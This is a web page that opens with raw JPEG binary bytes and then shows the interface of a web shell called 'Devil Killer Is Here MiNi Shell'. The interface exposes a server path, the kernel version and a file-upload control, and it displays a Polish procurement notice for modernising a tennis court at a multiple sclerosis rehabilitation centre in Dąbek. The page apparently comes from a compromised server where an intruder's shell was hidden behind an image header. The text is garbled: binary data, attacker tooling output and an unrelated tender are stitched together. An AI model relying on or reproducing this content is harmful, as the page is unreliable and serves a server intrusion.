JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230613/0025656001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja kortu tenisowego na terenie Krajowego Ośrodka Mieszkalno -Rehabilitacyjnego Dla Osób Chorych na SM <br/>w Dąbku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krajowy Ośrodek Mieszkalno - Rehabilitacyjny dla Osób Chorych na Stwardnienie Rozsiane (SM) w Dąbku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 130148288</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dąbek 129</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stupsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">06-561</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL922 - Ciechanowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">236531331</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">236531334</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@komr.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.komrdabek.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja kortu tenisowego na terenie Krajowego Ośrodka Mieszkalno -Rehabilitacyjnego Dla Osób Chorych na SM <br/>w Dąbku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e2481703-09c0-11ee-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00256560</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00007797/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Modernizacja kortu tenisowego na terenie Krajowego Ośrodka Mieszkalno - Rehabilitacyjnego dl Osób Chorych na SM w Dąbku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://komr.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://komr.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">:W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się za pomocą poczty elektronicznej email przy użyciu<br/>adresu: e-mail: sekretariat@komr.pl oraz za pośrednictwem platformy zakupowej pod adresem https://komr.ezamawiajacy.pl<br/>Wymagania techniczne i organizacyjne oraz dotyczące zasad rejestracji i minimalnych parametrów technicznych wymaganych od<br/>Wykonawcy opisane zostały w pkt. VIII SWZ oraz w instrukcji dla Wykonawcy</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">załącznik nr 7 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KO-SM.VIII.250/3/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 447992,86 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest modernizacja kortu tenisowego na terenie Krajowego Ośrodka Mieszkalno-Rehabilitacyjnego<br/>Dla Osób Chorych na SM w Dąbku w formule „zaprojektuj i wybuduj” – zadanie realizowane w ramach Budżetu<br/>Obywatelskiego Mazowsza. LOKALIZACJA ZADANIA: działka wpisana do rejestru zabytków Województwa Mazowieckiego<br/>pod nr A-240 w miejscowości Dąbek, nr 129, nr ewidencyjny gruntu 695/2, obręb geodezyjny 0007 Dąbek, gmina wiejska<br/>Stupsk Mazowiecki - teren Krajowego Ośrodka Mieszkalno-Rehabilitacyjnego Dla Osób Chorych na SM (Stwardnienie<br/>Rozsiane) w Dąbku, Dąbek 129, 06-561 Stupsk Mazowiecki - będącego jednostką organizacyjną podległą Samorządowi<br/>Województwa Mazowieckiego. 2. Zamówienie obejmuje:1) Przedmiotem zamówienia jest wykonanie dokumentacji<br/>projektowej (w tym uzyskanie koniecznych pozwoleń i uzgodnień, tj. pozwolenie Mazowieckiego Wojewódzkiego<br/>Konserwatora Zabytków, pozwolenie na budowę lub zgłoszenie budowy - o ile będą wymagane) i na jej podstawie<br/>zrealizowanie modernizacji nawierzchni kortu do tenisa ziemnego wraz z wymianą ogrodzenia oraz dostawą wyposażenia<br/>towarzyszącego na terenie Krajowego Ośrodka Mieszkalno - Rehabilitacyjnego Dla Osób Chorych na Stwardnienie<br/>Rozsiane (SM) w Dąbku, Dąbek 129, 06-561 Stupsk Mazowiecki w systemie „zaprojektuj i wybuduj”. 2) W/ w dokumentacja<br/>obejmować ma w szczególności: • materiały do pozwolenia na budowę / zgłoszenia budowy lub wykonywania innych robót<br/>budowlanych – 4 egzemplarze w wersji papierowej oraz 2 egzemplarze w wersji elektronicznej w formacie PDF i dwg oraz w wersji edytowalnej DOC; • projekt wykonawczy – 3 egzemplarze w wersji papierowej oraz 2 egzemplarze w wersji<br/>elektronicznej w formacie PDF i dwg oraz w wersji edytowalnej DOC; • kosztorysy – 2 egzemplarze w wersji papierowej oraz<br/>2 egzemplarze w wersji elektronicznej w formacie PDF i .ath; • Specyfikacje Techniczne Wykonania i Odbioru Robót - 2<br/>egzemplarze w wersji papierowej oraz 2 egzemplarze w wersji elektronicznej w formacie PDF oraz w wersji edytowalnej<br/>DOC; • dokumentację powykonawczą – 2 egz. egzemplarze w wersji papierowej oraz 2 egzemplarze w wersji elektronicznej<br/>w formacie PDF. 3) Opracowanie harmonogramu rzeczowo-finansowego na realizację robót; 4) Sprawowanie nadzoru<br/>autorskiego; 5) Wykonanie robót obejmuje w szczególności: Wykonawca robót w ramach przedmiotowej modernizacji<br/>winien zaprojektować prace, uzyskać wymagane pozwolenia, a następnie w oparciu o sporządzoną dokumentację<br/>projektową i zgodnie z uzyskanymi decyzjami dokonać wymiany nawierzchni tartanowej (poliuretanowej) wraz z wymianą<br/>ogrodzenia, montażem siedzisk dla widowni (4 x 5 szt.) oraz zakupem i dostawą drobnego wyposażenia (siatka kortu ze<br/>słupkami – 1 kpl, piłki – szt. 24, rakiety – szt. 4).Uwaga: wszystkie prace należy wykonywać w taki sposób, aby nie zakłócały<br/>bieżącego funkcjonowania Ośrodka, tj. prowadzenia zajęć rehabilitacyjnych i innych aktywności odbywających się na<br/>terenie KOMR w Dąbku. 3. Szczegółowy zakres przedmiotu zamówienia oraz standard wykonania został określony w<br/>następujących dokumentach:- Programie Funkcjonalno - Użytkowym - stanowiącym załącznik nr 1 do SWZ, - Przedmiarze<br/>(materiał pomocniczy) – stanowiącym załącznik nr 8 do SWZ,- pozostałe warunki realizacji zamówienia zostały określone<br/>we wzorze umowy, stanowiącym załącznik nr 6 do SWZ. • Wykonanie przedmiotu umowy odbywać się będzie w dwóch<br/>etapach: - I etap – wykonanie dokumentacji projektowej i jej uzgodnienia, uzyskanie niezbędnych pozwoleń lub dokonanie<br/>wymaganych zgłoszeń;- II etap – wykonanie prac związanych z modernizacją kortu i dostawą wyposażenia, sprawowanie<br/>nadzoru autorskiego, odbiory. <br/>W związku z tym, że zadanie inwestycyjne finansowane jest ze środków Budżetu Obywatelskiego Mazowsza (BOM) Wykonawca winien przestrzegać „wytycznych do stosowania herbu Województwa Mazowieckiego oraz logo Marki Mazowsze”, które dostępne są na stronie internetowej www.mazovia.pl w zakładce Marka Mazowsze. Wytyczne do stosowania oraz Logo BOM dostępne są na stronie internetowej www.bom.mazovia.pl, w zakładce „Do pobrania” w sekcji „Stosowanie logotypów”.<br/>Ponadto Wykonawca przedmiotowego zadania publicznego dotyczącego realizacji inwestycji budowlanej zobowiązany jest do przesłania Zamawiającemu dokumentacji fotograficznej obrazującej: <br/>•	stan podczas realizacji inwestycji obrazujący postęp prac – w terminie do 30 dni od upływu połowy czasu przeznaczonego na ukończenie inwestycji,<br/>•	stan po zakończeniu inwestycji - w terminie do 30 dni od jej zakończenia.<br/><br/>Po zakończonej realizacji projektu Wykonawca na swój koszt zamontuje tablicę informacyjną z nazwą projektu, źródle finansowania wraz z logotypem Budżetu Obywatelskiego Mazowsza i logotypem Marki Mazowsze (przykładowy opis: nazwa projektu + zadanie zrealizowane ze środków Samorządu Województwa Mazowieckiego w ramach Budżetu Obywatelskiego Mazowsza). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45212140-9 - Obiekty rekreacyjne</p> <p class="mb-0">37400000-2 - Artykuły i sprzęt sportowy</p> <p class="mb-0">37452720-4 - Wyposażenie kortu tenisowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres udzielonej gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność do występowania w obrocie gospodarczym Zamawiający nie precyzuje w tym zakresie żadnych szczegółowych<br/>wymagań, których spełnianie Wykonawca zobowiązany jest wykazać. Ocena spełniania ww. warunku udziału w<br/>postępowaniu zostanie dokonana w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu. 2)<br/>Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej. Zamawiający nie precyzuje w tym<br/>zakresie żadnych szczegółowych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać. Ocena spełniania<br/>ww. warunku udziału w postępowaniu zostanie dokonana w oparciu o oświadczenie o spełnianiu warunków udziału w<br/>postępowaniu. 3) Sytuacja ekonomiczna lub finansowa. Zamawiający nie stawia szczegółowych wymagań w zakresie<br/>spełniania warunku udziału w postępowaniu w odniesieniu do warunku dotyczącego sytuacji finansowej. Warunek w<br/>odniesieniu do sytuacji ekonomicznej zostanie spełniony, jeśli Wykonawca wykaże, że posiada ubezpieczenie od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem zamówienia na wartość nie<br/>mniejszą niż wartość kontraktu. 4) Zdolności techniczne lub zawodowe. O udzielenie zamówienia mogą ubiegać się<br/>Wykonawcy spełniający szczegółowe warunki udziału w postępowaniu, tj.:<br/>a) Wykonawcy ubiegający się o udzielenie zamówienia publicznego muszą wykazać, że wykonali<br/>w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w<br/>tym okresie, co najmniej jednej roboty budowlanej polegającej na budowie, przebudowie, modernizacji lub remoncie boiska<br/>sportowego lub kortu tenisowego o wartości wykonanych robót nie mniejszej niż 200 000,00 zł brutto, z podaniem wartości,<br/>daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty te zostały wykonane zgodnie z<br/>zasadami sztuki budowlanej i prawidłowo ukończone. Ocena spełniania warunku udziału w postępowaniu zostanie<br/>dokonana przez Zamawiającego w oparciu o informacje zawarte w: - oświadczeniu o spełnianiu warunków udziału w<br/>postępowaniu, - w wykazie wykonanych robót budowlanych oraz w dowodach określających czy te roboty budowlane<br/>zostały wykonane należycie, w szczególności zgodnie z przepisami prawa budowlanego i prawidłowo ukończone (załącznik<br/>4A SWZ). b) Wykonawca ubiegający się o udzielenie zamówienia publicznego musi wykazać, że w wykonywaniu<br/>zamówienia uczestniczyć będzie: - jedna osoba, jako kierownik robót budowlanych, posiadający kwalifikacje zawodowe,<br/>doświadczenie i uprawnienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 roku (Dz. U. z 2021.2351 t.j.), który<br/>w trakcie realizacji zamówienia będzie kierować robotami: kierownik robót branży budowlanej - z uprawnieniami<br/>budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń, załącznik nr 4B do SWZ; - jedna osoba,<br/>uprawniony projektant, załącznik nr 4B do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz<br/>podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w<br/>postępowaniu: Zamawiający w niniejszym postępowaniu wymaga, aby wykonawcy wykazując brak<br/>podstaw do wykluczenia złożyli wymagane oświadczenia / dokumenty do oferty. Na podstawie art. 125 ust. 1ustawy Pzp w terminie<br/>składania ofert każdy z wykonawców składa oświadczenia o braku<br/>podstaw do wykluczenia z postępowania – Załącznik numer 3 do SWZ Oświadczenia te potwierdzają<br/>brak podstaw wykluczenia z postępowania</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Oświadczenie o<br/>przynależności albo braku przynależności do tej samej grupy kapitałowej.<br/>Wyżej wymienione oświadczenie należy złożyć zgodnie ze wzorem zamieszczonym w załączniku Nr 5 do SWZ (art. 108 ust. 1 pkt 5<br/>Ustawy); 2) Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4<br/>Ustawy;<br/>Dokumenty powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. a) Jeżeli Wykonawca ma<br/>siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu jak wyżej, składa dokument lub<br/>dokumenty wystawione w kraju,<br/>w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono<br/>upadłości. b) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której<br/>dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio<br/>oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której<br/>dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu<br/>zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce<br/>zamieszkania tej osoby.<br/>Dokumenty/oświadczenia powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem składania ofert.<br/>3) Wykaz wykonanych robót budowlanych oraz dowody określające czy te roboty budowlane zostały wykonane należycie, w<br/>szczególności zgodnie z przepisami prawa budowlanego i prawidłowo ukończone (załącznik nr 4A do SWZ).<br/>4) Wykonawca ubiegający się o udzielenie zamówienia publicznego musi wykazać, że w wykonywaniu zamówienia uczestniczyć<br/>będą osoby posiadające uprawnienia budowlane niezbędne do wykonania przedmiotu zamówienia, ze wskazaniem zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami, a mianowicie:<br/>- jedna osoba, jako kierownik budowy, posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności<br/>konstrukcyjno-budowlanej bez ograniczeń, zgodnie z załącznikiem 4B do SWZ; - jedna osoba, jako projektant, posiadający<br/>uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń – zgodnie z załącznikiem 4B do<br/>SWZ.<br/>5) Oświadczenie o posiadanych uprawnieniach na temat wykształcenia i kwalifikacji zawodowych wykonawcy – zgodnie z<br/>załącznikiem 4C do SWZ. 6) Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że Wykonawca nie zalega z opłacaniem składek<br/>na ubezpieczenia społeczne lub zdrowotne, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 7)<br/>Dokument potwierdzający ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/>przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż wysokość kontraktu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Przedmiotowe środki dowodowe dotyczące projektowanej nawierzchni kortu tenisowego wymagane od Wykonawcy<br/>obejmują:<br/>1) Aktualne badania na zgodność z normą PN-EN 14877:2014, potwierdzające minimalne<br/>parametry oferowanej nawierzchni wymagane przez Zamawiającego,<br/>2) Atest Higieniczny PZH lub równoważny,<br/>3) Karta techniczna nawierzchni poświadczona przez producenta z określeniem nazwy inwestycji,<br/>4) Autoryzacja producenta nawierzchni wystawiona na Wykonawcę z określeniem nazwy<br/>inwestycji i potwierdzeniem gwarancji producenta na oferowaną nawierzchnię,<br/>5) Badania na bezpieczeństwo ekologicznie nawierzchni potwierdzające wymaganą zawartość<br/>związków chemicznych zgodnie z normą DIN 18035-6:2021-08,<br/>6) Badania reakcji na ogień na poziomie min. CflS1. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty 